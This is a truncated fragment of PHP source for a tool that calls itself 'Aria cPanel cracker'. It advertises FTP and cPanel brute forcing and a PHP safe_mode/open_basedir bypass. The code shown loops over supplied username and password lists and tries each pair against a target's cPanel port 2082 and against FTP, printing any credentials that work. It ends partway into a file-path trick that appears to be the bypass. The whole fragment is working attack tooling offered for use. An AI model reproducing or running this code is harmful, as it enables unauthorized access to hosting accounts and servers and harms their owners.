|
Please enter your USERNAME and PASSWORD to logon user 220 +ok pass ******** 220 +ok login successful [ user@alturks.com ]# info Aria cPanel cracker version : 1.0 Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version Our website , http://alturks.com |
";
?>
Error : Connection timed out , make confidence about validation of target !";
exit;}
elseif ( curl_errno($ch) == 0 ){
print
"[ user@alturks.com ]#
Attacking has been done , found username , $user and password ,
$pass
";}curl_close($ch);}
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print " Error : Connection timed out , make confidence about validation of target !";
exit;}
elseif ( curl_errno($ch) == 0 ){
print
"[ user@alturks.com ]#
Attacking has been done , found username , $user and password ,
$pass
";}curl_close($ch);}
if(isset($submit) && !empty($submit)){
$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
print "[ user@alturks.com ]# Attacking ...
";
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
}
}elseif ( $page == 'users'){
echo "
";
echo '';
$file = $_POST['file'];
$level=0;
if(!file_exists("file:"))
@mkdir("file:");
@chdir("file:");
$level++;
$hardstyle = @explode("/", $file);
for($a=0;$a |